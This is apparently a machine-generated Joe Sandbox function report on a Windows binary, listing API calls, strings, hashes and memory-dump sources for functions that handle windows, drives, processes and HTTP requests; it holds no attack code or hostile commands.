API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 91ed733537ae0d7fbcd15cd61a5de465699a2572e5391a5ffcc3372b055cda2d
Instruction ID: 3ebe1b0d0e2e79aa4efd94dc00acf685adee68ed692abd5a573863193648506d
Opcode Fuzzy Hash: 91ed733537ae0d7fbcd15cd61a5de465699a2572e5391a5ffcc3372b055cda2d
Instruction Fuzzy Hash: BA61C071900219BAEB14DF64CC45BFF77A8FF08B10F10811AF915DA1D1DBB8A991CBA4

Function 003F48BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 003F493D
_wcslen.LIBCMT ref: 003F4948
_wcslen.LIBCMT ref: 003F499F
_wcslen.LIBCMT ref: 003F49DD
GetDriveTypeW.KERNEL32(?), ref: 003F4A1B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003F4A63
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003F4A9E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003F4ACC

Strings

wait, xrefs: 003F4A89
close cd wait, xrefs: 003F4AB7
close, xrefs: 003F4943, 003F495D
open , xrefs: 003F4A2A
closed, xrefs: 003F494D, 003F4972, 003F498B, 003F49C3, 003F49DC
open, xrefs: 003F4999, 003F499E
set cd door , xrefs: 003F4A6D
type cdaudio alias cd wait, xrefs: 003F4A46

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: f4032bd3a1befc7a8ef216f951070f520b50982d7302b54cf85e35bdd70444da
Instruction ID: b74da72448d9400b2aa1eb58a2f9a92c4aeed8840e069a8d62e0aa10b8080d74
Opcode Fuzzy Hash: f4032bd3a1befc7a8ef216f951070f520b50982d7302b54cf85e35bdd70444da
Instruction Fuzzy Hash: 6271F2326083069FC702EF24C88097BB7E4EF94768F50496DF99697262EB30DD46CB91

Function 003E6382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 003E6395
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 003E63A7
SetWindowTextW.USER32(?,?), ref: 003E63BE
GetDlgItem.USER32(?,000003EA), ref: 003E63D3
SetWindowTextW.USER32(00000000,?), ref: 003E63D9
GetDlgItem.USER32(?,000003E9), ref: 003E63E9
SetWindowTextW.USER32(00000000,?), ref: 003E63EF
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 003E6410
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 003E642A
GetWindowRect.USER32(?,?), ref: 003E6433
_wcslen.LIBCMT ref: 003E649A
SetWindowTextW.USER32(?,?), ref: 003E64D6
GetDesktopWindow.USER32 ref: 003E64DC
GetWindowRect.USER32(00000000), ref: 003E64E3
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 003E653A
GetClientRect.USER32(?,?), ref: 003E6547
PostMessageW.USER32(?,00000005,00000000,?), ref: 003E656C
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 003E6596

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: b052ae8e817bf672bf03866012470d3661b79d876c8009a00f1b1664430fe652
Instruction ID: bfb7181e787a8fd91b33a65774f358f3be0598b684c6dd8e2ac3426b68bf2d51
Opcode Fuzzy Hash: b052ae8e817bf672bf03866012470d3661b79d876c8009a00f1b1664430fe652
Instruction Fuzzy Hash: 8471BF71A006159FDB21DFAACE46AAEBBF5FF58744F104628E186A25E0C774E940CF50

Function 0040086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00400884
LoadCursorW.USER32(00000000,00007F8A), ref: 0040088F
LoadCursorW.USER32(00000000,00007F00), ref: 0040089A
LoadCursorW.USER32(00000000,00007F03), ref: 004008A5
LoadCursorW.USER32(00000000,00007F8B), ref: 004008B0
LoadCursorW.USER32(00000000,00007F01), ref: 004008BB
LoadCursorW.USER32(00000000,00007F81), ref: 004008C6
LoadCursorW.USER32(00000000,00007F88), ref: 004008D1
LoadCursorW.USER32(00000000,00007F80), ref: 004008DC
LoadCursorW.USER32(00000000,00007F86), ref: 004008E7
LoadCursorW.USER32(00000000,00007F83), ref: 004008F2
LoadCursorW.USER32(00000000,00007F85), ref: 004008FD
LoadCursorW.USER32(00000000,00007F82), ref: 00400908
LoadCursorW.USER32(00000000,00007F84), ref: 00400913
LoadCursorW.USER32(00000000,00007F04), ref: 0040091E
LoadCursorW.USER32(00000000,00007F02), ref: 00400929
GetCursorInfo.USER32(?), ref: 00400939
GetLastError.KERNEL32 ref: 0040097B

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 14ecc2854654991d3677b5990ac05b6a6b7ee02e76c57d2c1655bb9dc2280ade
Instruction ID: 0f943f033fd14281074ca761e1217cc8a17d3bdaadc35fa3a9a684fe6eb51f32
Opcode Fuzzy Hash: 14ecc2854654991d3677b5990ac05b6a6b7ee02e76c57d2c1655bb9dc2280ade
Instruction Fuzzy Hash: A64142B0D083196ADB10DFBA8C8996EBFE8FF04754B50453AE11CEB291DA78D901CF95

Function 003E3A43 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 003E3AD9
_wcslen.LIBCMT ref: 003E3B44

Strings

INSTANCE, xrefs: 003E3D9F
NAME, xrefs: 003E3C81, 003E3C92
TEXT, xrefs: 003E3DC8
REGEXPCLASS, xrefs: 003E3BA1, 003E3BB2
CLASSNN, xrefs: 003E3B3F, 003E3B50
CLASS, xrefs: 003E3AD4, 003E3AF1
kD, xrefs: 003E3CE6

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$kD
API String ID: 176396367-1321853956
Opcode ID: d26bceed851d9f0641612e7e5c8dc059f6c80a4e606efff00990f1beb3a14af5
Instruction ID: cdf6802f04ca4c5a1571b49963416a8d94b39c21d88efb54f5ecd12a4f3f8451
Opcode Fuzzy Hash: d26bceed851d9f0641612e7e5c8dc059f6c80a4e606efff00990f1beb3a14af5
Instruction Fuzzy Hash: 5DE12732E00576ABCB169F76C8496EDF7B4FF54710F16832AE456E7280DB30AE458790

Function 00419B7A Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0

DragQueryPoint.SHELL32(?,?), ref: 00419BA3

Part of subcall function 004180AE: ClientToScreen.USER32(?,?), ref: 004180D4
Part of subcall function 004180AE: GetWindowRect.USER32(?,?), ref: 0041814A
Part of subcall function 004180AE: PtInRect.USER32(?,?,?), ref: 0041815A

SendMessageW.USER32(?,000000B0,?,?), ref: 00419C0C
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00419C17
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00419C3A
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00419C81
SendMessageW.USER32(?,000000B0,?,?), ref: 00419C9A
SendMessageW.USER32(?,000000B1,?,?), ref: 00419CB1
SendMessageW.USER32(?,000000B1,?,?), ref: 00419CD3
DragFinish.SHELL32(?), ref: 00419CDA
DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00419DCD

Strings

@GUI_DRAGID, xrefs: 00419D45
(E, xrefs: 00419B8C
(E, xrefs: 00419DAB
@GUI_DROPID, xrefs: 00419CFA
@GUI_DRAGFILE, xrefs: 00419D7C

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$(E$(E
API String ID: 221274066-2209318891
Opcode ID: 694a2d8c9317273a9daa6ef0ec7e2a0247298b9ca0ef824ce27a54a52618e74e
Instruction ID: a0365cc7595210514a8dac469819b0bb05244ae5de94794b84374b0138889a15
Opcode Fuzzy Hash: 694a2d8c9317273a9daa6ef0ec7e2a0247298b9ca0ef824ce27a54a52618e74e
Instruction Fuzzy Hash: A561AB71508301AFC301EF60CC85E9FBBE8FF89750F00492EF595962A1DB74AA49CB56

Function 003A0436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 003A0436

Part of subcall function 003A045D: InitializeCriticalSectionAndSpinCount.KERNEL32(0045170C,00000FA0,CCD40A85,?,?,?,?,003C2733,000000FF), ref: 003A048C
Part of subcall function 003A045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,003C2733,000000FF), ref: 003A0497
Part of subcall function 003A045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,003C2733,000000FF), ref: 003A04A8
Part of subcall function 003A045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 003A04BE
Part of subcall function 003A045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 003A04CC
Part of subcall function 003A045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 003A04DA
Part of subcall function 003A045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003A0505
Part of subcall function 003A045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003A0510

___scrt_fastfail.LIBCMT ref: 003A0457

Part of subcall function 003A0413: __onexit.LIBCMT ref: 003A0419

Strings

kernel32.dll, xrefs: 003A04A3
InitializeConditionVariable, xrefs: 003A04B8
SleepConditionVariableCS, xrefs: 003A04C4
WakeAllConditionVariable, xrefs: 003A04D2
api-ms-win-core-synch-l1-2-0.dll, xrefs: 003A0492

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 2b3e4956362224c4a63072fe6e7d7d01cb597297dfe3e90f9d6d95bb5f72485c
Instruction ID: 1a4f236dfb8b3179952a3bbc049f291ebdab8786954f0e19d5db72176ae4c388
Opcode Fuzzy Hash: 2b3e4956362224c4a63072fe6e7d7d01cb597297dfe3e90f9d6d95bb5f72485c
Instruction Fuzzy Hash: B1213872E457147FD71A2BA9AC06BA937E4EF0BB62F104136F90597291DF789C008E5C

Function 003F4F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0041DCD0), ref: 003F4F6C
_wcslen.LIBCMT ref: 003F4F80
_wcslen.LIBCMT ref: 003F4FDE
_wcslen.LIBCMT ref: 003F5039
_wcslen.LIBCMT ref: 003F5084
_wcslen.LIBCMT ref: 003F50EC

Part of subcall function 0039FD52: _wcslen.LIBCMT ref: 0039FD5D

GetDriveTypeW.KERNEL32(?,00447C10,00000061), ref: 003F5188

Strings

all, xrefs: 003F4F76, 003F4F7B
unknown, xrefs: 003F514D
removable, xrefs: 003F502F, 003F5034
cdrom, xrefs: 003F4FD4, 003F4FD9
network, xrefs: 003F50E2, 003F50E7
ramdisk, xrefs: 003F5136
fixed, xrefs: 003F507A, 003F507F

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 77efa4eb280cdca464c192a6365723f3bba35fd04cd1f6ff1857768f59b81178
Instruction ID: 08001f238ee505005b53bea5b2349628ce3ea376de69325fa9bc0913b9cf4465
Opcode Fuzzy Hash: 77efa4eb280cdca464c192a6365723f3bba35fd04cd1f6ff1857768f59b81178
Instruction Fuzzy Hash: 9FB11231608706AFC712EF28C890A7AB7E5EFA5724F51491DF796C7291DB30E844CB92

Function 0040BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040BBF8
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0040BC10
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0040BC34
_wcslen.LIBCMT ref: 0040BC60
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0040BC74
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0040BC96
_wcslen.LIBCMT ref: 0040BD92

Part of subcall function 003F0F4E: GetStdHandle.KERNEL32(000000F6), ref: 003F0F6D

_wcslen.LIBCMT ref: 0040BDAB
_wcslen.LIBCMT ref: 0040BDC6
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0040BE16
GetLastError.KERNEL32(00000000), ref: 0040BE67
CloseHandle.KERNEL32(?), ref: 0040BE99
CloseHandle.KERNEL32(00000000), ref: 0040BEAA
CloseHandle.KERNEL32(00000000), ref: 0040BEBC
CloseHandle.KERNEL32(00000000), ref: 0040BECE
CloseHandle.KERNEL32(?), ref: 0040BF43

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 39c950d0b6490322ca7bdb510a3a867e92d439bb2ca56ace106e65d932a88ccf
Instruction ID: 3d5a4a51dfe2d4a0449bf59aa1500cb0bdbb6150950bc4472473a4e8af3355c3
Opcode Fuzzy Hash: 39c950d0b6490322ca7bdb510a3a867e92d439bb2ca56ace106e65d932a88ccf
Instruction Fuzzy Hash: 91F18B716043019FC715EF24C891B6ABBE5EF85310F14896EF8859F2A2CB74EC45CB9A

Function 00404A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0041DCD0), ref: 00404B18
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00404B2A
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0041DCD0), ref: 00404B4F
FreeLibrary.KERNEL32(00000000,?,0041DCD0), ref: 00404B9B
StringFromGUID2.OLE32(?,?,00000028,?,0041DCD0), ref: 00404C05
SysFreeString.OLEAUT32(00000009), ref: 00404CBF
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00404D25
SysFreeString.OLEAUT32(?), ref: 00404D4F

Strings

kernel32.dll, xrefs: 00404B13
GetModuleHandleExW, xrefs: 00404B24

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: cc6f08e8435feebd05ae8a98b3541feb82854f820baf44686f4671031ea04a4c
Instruction ID: afbb36fa0d226031d18f8e651aab45ad61b37336719e59f434769d47669e3fc1
Opcode Fuzzy Hash: cc6f08e8435feebd05ae8a98b3541feb82854f820baf44686f4671031ea04a4c
Instruction Fuzzy Hash: 32124DB1A00115EFDB14DF94C884EAEB7B5FF85314F2480A9FA05AB291D735ED42CBA4

Function 0038381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(004529C0), ref: 003C3F72
GetMenuItemCount.USER32(004529C0), ref: 003C4022
GetCursorPos.USER32(?), ref: 003C4066
SetForegroundWindow.USER32(00000000), ref: 003C406F
TrackPopupMenuEx.USER32(004529C0,00000000,?,00000000,00000000,00000000), ref: 003C4082
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003C408E

Strings

0, xrefs: 0038382D

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: cb75a5baf64b7b56f6f9f36f67c467701682d42ef08aee85be099ef1eb542121
Instruction ID: c6ecca6f1aca24e6c82dab8e3608d9498c4e3dc1ab3a909d5ef71dbbbfb56410
Opcode Fuzzy Hash: cb75a5baf64b7b56f6f9f36f67c467701682d42ef08aee85be099ef1eb542121
Instruction Fuzzy Hash: 0B712671A44315BEEB229F29DC49FEABF69FF04764F10421AF514AA2E0C7B1AD10CB54

Function 00417711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 00417823

Part of subcall function 00388577: _wcslen.LIBCMT ref: 0038858A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00417897
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 004178B9
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004178CC
DestroyWindow.USER32(?), ref: 004178ED
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00380000,00000000), ref: 0041791C
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00417935
GetDesktopWindow.USER32 ref: 0041794E
GetWindowRect.USER32(00000000), ref: 00417955
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0041796D
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00417985

Part of subcall function 00382234: GetWindowLongW.USER32(?,000000EB), ref: 00382242

Strings

tooltips_class32, xrefs: 00417890, 00417915
0, xrefs: 004177D0

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 45b50b85cf4f785c32a697616ca8cc5d9508fdbe5361aa8e9160db900f8cb5c8
Instruction ID: 3144eb253c554b1abcd94962b4d3e0b3d436fd44c1e686e252b00b99cfccd562
Opcode Fuzzy Hash: 45b50b85cf4f785c32a697616ca8cc5d9508fdbe5361aa8e9160db900f8cb5c8
Instruction Fuzzy Hash: BF7159B0644345AFE721DF18CC48BABBBF9EB89300F14446EF98587361C778A946CB19

Function 0038146D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00381802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00381488,?,00000000,?,?,?,?,0038145A,00000000,?), ref: 00381865

DestroyWindow.USER32(?), ref: 00381521
KillTimer.USER32(00000000,?,?,?,?,0038145A,00000000,?), ref: 003815BB
DestroyAcceleratorTable.USER32(00000000), ref: 003C29B4
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0038145A,00000000,?), ref: 003C29E2
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0038145A,00000000,?), ref: 003C29F9
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0038145A,00000000), ref: 003C2A15
DeleteObject.GDI32(00000000), ref: 003C2A27

Strings

<)E, xrefs: 003815E0

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID: <)E
API String ID: 641708696-2428563218
Opcode ID: 8bacf09bce0cab165a6a15c61a198cc392278a3137c120e275cb9a525fbff107
Instruction ID: 75171315ad966145af578609f63bf965e8103b0bf7bdd3f2e475f71022e9fb5e
Opcode Fuzzy Hash: 8bacf09bce0cab165a6a15c61a198cc392278a3137c120e275cb9a525fbff107
Instruction Fuzzy Hash: 1B617D71601701DFDB36AF15DA48B2677B9FB82312F11806DE04687A61C770ED92CB88

Function 003FCEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003FCEF5
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 003FCF08
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 003FCF1C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003FCF35
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 003FCF78
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003FCF8E
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003FCF99
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003FCFC9
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 003FD021
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 003FD035
InternetCloseHandle.WININET(00000000), ref: 003FD040

Strings

, xrefs: 003FCFBA

Memory Dump Source

